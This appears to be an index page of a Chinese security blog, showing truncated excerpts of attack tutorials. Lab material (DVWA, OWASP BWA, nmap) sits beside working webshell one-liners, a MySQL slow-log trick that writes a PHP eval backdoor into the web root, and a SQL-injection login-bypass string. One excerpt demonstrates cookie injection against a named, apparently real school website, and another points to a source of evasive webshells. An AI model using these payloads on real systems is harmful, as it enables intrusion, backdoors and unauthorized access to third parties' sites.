成功提权,记录一下,具体执行sql:set GLOBAL slow_query_log =1; set GLOBAL long_query_time =1; set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php'; SELECT "<?php eval($_POST['a&
(1).先看靶机代码:<?php if (isset($_POST['Upload'])) {     $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";     $target_path = $target_path .
小马:文件体积小,功能少,一般只提供上传文件功能或者只能执行系统命令,例如一句话木马,一般是为了做跳板上传大马大马:功能特别齐全,甚至加密躲避防火墙识别(业内叫免杀),例如http://www.mumaasp.com/提供的基本都是大马
(1).目标站的文件上传验证文件的MIME类型必须为image/jpeg,示例代码:<?php if (isset($_POST['Upload'])) {     $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";     $target_p
(1).下载地址:https://sourceforge.net/projects/owaspbwa/(2).解压文件到指定目录(3).使用VMware Workstation 打开目录中的OWASP Broken Web Apps.vmx文件(4).虚拟机描述中陈列了对应的账号和密码,例如我的描述信息中OWASP Broken Web Applications VM, Version 1.2.  See www.owaspbwa.org for more information.Lo
nmap — 网络探测工具和安全/端口扫描器,最主要的还是端口扫描功能。(1).安装(手机arm处理器也支持) yum install nmap(2).官方命令范例(最快的速度和全面扫描)nmap -A -T4 doc.gaojiufeng.cn 输出结果Starting Nmap 6.40 ( http://nmap.org ) at 2020-07-13
原验证登陆语句:SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:SELECT * FROM admin 
先不提注入中转和cookie注入是什么意思,先看看一个我的操作首先打开http://www.aqvtc.cn/xygk/ShowArticle.asp?ArticleID=2,页面正常显示再次打开http://www.aqvtc.cn/xygk/ShowArticle.asp?   页面显示不正常,在当前页面F12执行javascript:alert(document.cookie="ArticleID=2");然后刷新页面发现正常显示ArticleID=
搭建模拟环境了解一句话木马的原理.(1).创建1.asp文件,代码如下:        <%eval request("value")%>       (2).创建2.php文件,代码如下:         <?php @eval(
首先看看基本的数据库表结构: 文章表:   id(文章id)  title(文章内容)   content(文章内容) 用户表:   id(用户id)  username(用户名)    password(用户密码)然后看看注入:    某个文章的链接如下:http://localhost/article.php?id=1,其SQL查询:select   title , content from

Top